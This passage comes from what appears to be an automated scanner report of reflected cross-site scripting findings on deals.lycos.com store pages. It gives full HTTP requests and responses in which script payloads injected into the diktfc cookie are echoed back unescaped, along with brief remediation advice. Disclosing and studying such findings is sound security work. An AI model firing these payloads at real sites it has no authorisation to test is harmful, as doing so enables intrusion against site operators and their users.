P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:38 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47061
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2630"%3balert(1)//4cb7f0b56a was submitted in the diktfc cookie. This input was echoed as d2630";alert(1)//4cb7f0b56a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/stores/buy-com-233 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad2630"%3balert(1)//4cb7f0b56a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:56 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46839
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94f2c"><script>alert(1)</script>8b3b9fa5add was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/stores/buy-com-233 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A94f2c"><script>alert(1)</script>8b3b9fa5add; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46873
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/stores/buy-com-233&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A94f2c"><script>alert(1)</script>8b3b9fa5add&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd3f3"><script>alert(1)</script>6d94b7cd86b was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/stores/dell-home-638 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd3f3"><script>alert(1)</script>6d94b7cd86b; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:35 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46898
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/stores/dell-home-638&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd3f3"><script>alert(1)</script>6d94b7cd86b&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efe09"%3balert(1)//d150acaf4db was submitted in the diktfc cookie. This input was echoed as efe09";alert(1)//d150acaf4db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/stores/dell-home-638 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aefe09"%3balert(1)//d150acaf4db; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:37 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46751
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55a88"><script>alert(1)</script>0fb01bfaa85 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/stores/ebay-50 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A55a88"><script>alert(1)</script>0fb01bfaa85; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:34 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47762
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/stores/ebay-50&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A55a88"><script>alert(1)</script>0fb01bfaa85&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 317e4"%3balert(1)//c8dbb3e8531 was submitted in the diktfc cookie. This input was echoed as 317e4";alert(1)//c8dbb3e8531 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/stores/ebay-50 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A317e4"%3balert(1)//c8dbb3e8531; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:36 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47597
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0001"%3balert(1)//e061132f52f was submitted in the diktfc cookie. This input was echoed as a0001";alert(1)//e061132f52f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/stores/itunes-music-store-1414 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa0001"%3balert(1)//e061132f52f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:37 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44807
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaef1"><script>alert(1)</script>ba52086b4b8 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/stores/itunes-music-store-1414 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaaef1"><script>alert(1)</script>ba52086b4b8; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:36 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44954
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/stores/itunes-music-store-1414&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaaef1"><script>alert(1)</script>ba52086b4b8&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f34a"><script>alert(1)</script>05c0ac4a695 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/stores/jcpenney-320 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f34a"><script>alert(1)</script>05c0ac4a695; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:33 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43101
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/stores/jcpenney-320&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f34a"><script>alert(1)</script>05c0ac4a695&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfcf4"%3balert(1)//5e595d1d45 was submitted in the diktfc cookie. This input was echoed as cfcf4";alert(1)//5e595d1d45 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/stores/jcpenney-320 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Acfcf4"%3balert(1)//5e595d1d45; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:35 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43049
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d946"><script>alert(1)</script>30c7b4c6229 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/stores/kohls-1009 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5d946"><script>alert(1)</script>30c7b4c6229; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:13 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22195
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/stores/kohls-1009&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5d946"><script>alert(1)</script>30c7b4c6229&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7eb51"%3balert(1)//dcef7041eb3 was submitted in the diktfc cookie. This input was echoed as 7eb51";alert(1)//dcef7041eb3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/stores/kohls-1009 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7eb51"%3balert(1)//dcef7041eb3; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22245
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34c81"%3balert(1)//0b0bfcb7a69 was submitted in the diktfc cookie. This input was echoed as 34c81";alert(1)//0b0bfcb7a69 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/stores/sony-style-716 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A34c81"%3balert(1)//0b0bfcb7a69; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:57 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30211
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d333"><script>alert(1)</script>bb3b7fe1ad4 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/stores/sony-style-716 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1d333"><script>alert(1)</script>bb3b7fe1ad4; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
